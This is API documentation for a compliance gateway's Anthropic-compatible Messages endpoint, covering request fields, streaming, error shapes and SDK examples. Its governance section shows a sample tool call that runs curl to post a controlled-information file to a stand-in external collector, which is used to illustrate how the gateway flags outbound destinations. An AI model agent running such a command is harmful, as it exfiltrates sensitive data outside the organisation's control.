Documentation Index
Fetch the complete documentation index at: https://gateway.consus.io/llms.txt
Use this file to discover all available pages before exploring further.
POST /v1/messages
Anthropic-compatible Messages API. Built specifically so coding agents like Claude Code can target Consus Gateway directly. Every request is served by Claude Sonnet 4.5 on ITAR-compliant infrastructure.
Unlike /v1/chat/completions, this endpoint is single-model by design. The model field on the request body is accepted but ignored. The compliance boundary is enforced at the architecture level — there is no path through this endpoint to a non-ITAR model.
Request
| Header | Required | Description |
|---|
x-api-key | Yes | Your API key |
Content-Type | Yes | application/json |
anthropic-version | No | Accepted but ignored. The gateway manages the version field for upstream compatibility — use the body field anthropic_version to override. |
Body
The body is forwarded as native Anthropic Messages API JSON. Refer to Anthropic’s Messages API reference for the full schema.
The gateway validates two fields and lets the upstream model validate everything else:
| Field | Required | Description |
|---|
messages | Yes | Non-empty array. |
max_tokens | Yes | Positive integer. |
The gateway-side handling for the rest:
model — accepted but ignored. Every request serves Sonnet 4.5.
stream — controls SSE response shape, see Streaming below.
anthropic_version — managed by the gateway for upstream compatibility. An explicit value in the body wins.
- Anthropic features the upstream provider does not yet support are stripped before forwarding (e.g.
context_management).
- All other fields (
system, temperature, top_p, tools, tool_choice, stop_sequences, metadata, …) pass through unchanged.
Response
| Header | Description |
|---|
x-consus-served-model | The model that actually served the request. Always claude-sonnet-4-5. |
x-request-id | UUID for tracing this request through gateway logs. |
Non-Streaming
The body is the native Anthropic Messages response, with one optional addition (x_consus_governance, see below).
{
"id": "msg_01ABC...",
"type": "message",
"role": "assistant",
"content": [
{"type": "text", "text": "Hello! How can I help you?"}
],
"model": "claude-sonnet-4-5",
"stop_reason": "end_turn",
"stop_sequence": null,
"usage": {
"input_tokens": 10,
"output_tokens": 12
}
}
Streaming
Set stream: true in the body to receive Server-Sent Events. The event sequence matches Anthropic’s streaming protocol:
event: message_start
data: {"type":"message_start","message":{...}}
event: content_block_start
data: {"type":"content_block_start","index":0,"content_block":{"type":"text","text":""}}
event: content_block_delta
data: {"type":"content_block_delta","index":0,"delta":{"type":"text_delta","text":"Hello!"}}
event: content_block_stop
data: {"type":"content_block_stop","index":0}
event: message_delta
data: {"type":"message_delta","delta":{"stop_reason":"end_turn","stop_sequence":null},"usage":{"output_tokens":12}}
event: message_stop
data: {"type":"message_stop"}
Tool use blocks emit content_block_delta with {"type":"input_json_delta","partial_json":"..."}.
Streaming caveat
The gateway buffers the upstream response before returning it to the client. The HTTP layer therefore delivers all SSE events at once after the upstream model finishes — the wire shape is correct, but incremental tokens are not delivered over time. Anthropic SDK clients that consume the SSE stream parse it correctly regardless.
Tool definitions and tool_use content blocks pass through natively. There is no translation through OpenAI’s tool_calls shape.
When a model returns tool_use blocks, the gateway scans each input payload for outbound destinations (URLs with a scheme like https://, ftp://, s3://, data:, mailto:, and raw IPv4 addresses). When any are found, the response includes an advisory x_consus_governance field alongside the standard Anthropic body. The tool_use block itself is not modified.
{
"id": "msg_01...",
"type": "message",
"role": "assistant",
"content": [
{
"type": "tool_use",
"id": "toolu_01...",
"name": "Bash",
"input": {"command": "curl https://collector.example.com/ingest -d @cui.txt"}
}
],
"model": "claude-sonnet-4-5",
"stop_reason": "tool_use",
"usage": {"input_tokens": 20, "output_tokens": 30},
"x_consus_governance": {
"flags": [
{
"tool_call_id": "toolu_01...",
"tool_name": "Bash",
"destinations": ["https://collector.example.com/ingest"],
"reason": "external_destination"
}
]
}
}
In streaming mode, flagged responses receive a final consus_governance SSE event after message_stop:
event: consus_governance
data: {"type":"consus_governance","x_consus_governance":{"flags":[...]}}
This is an advisory signal. The gateway does not block or redact tool calls — your application receives the real input and decides what to do with the destinations.
Errors
Errors are returned in Anthropic’s error shape:
{
"type": "error",
"error": {
"type": "invalid_request_error",
"message": "'max_tokens' must be a positive integer."
}
}
| Status | Anthropic error.type | When |
|---|
| 400 | invalid_request_error | Body is not valid JSON, messages empty/missing, max_tokens missing or non-positive, or the upstream model rejected the request. |
| 401 | authentication_error | API key is missing or invalid. |
| 429 | rate_limit_error | Upstream model rate limit, or your key’s rate/quota limit. |
| 500 / 502 / 504 | api_error | Internal error, upstream provider outage, or upstream timeout. |
Known Limitations
- No
/v1/messages/count_tokens. Clients that call it (Anthropic SDK in some configurations) fall back to client-side estimation; this works for Claude Code in practice.
- Streaming buffers at the gateway boundary. See the streaming caveat above.
- Single-model endpoint. The
model field is ignored. If you need a different model, use /v1/chat/completions.
Examples
curl
curl -X POST https://api.consus.io/v1/messages \
-H "x-api-key: $CONSUS_API_KEY" \
-H "Content-Type: application/json" \
-d '{
"max_tokens": 256,
"messages": [{"role": "user", "content": "Hello."}]
}'
Anthropic Python SDK
from anthropic import Anthropic
client = Anthropic(
base_url="https://api.consus.io",
api_key="$CONSUS_API_KEY",
default_headers={"x-api-key": "$CONSUS_API_KEY"},
)
message = client.messages.create(
model="claude-sonnet-4-5", # ignored by the gateway, kept for SDK compatibility
max_tokens=256,
messages=[{"role": "user", "content": "Hello."}],
)
print(message.content[0].text)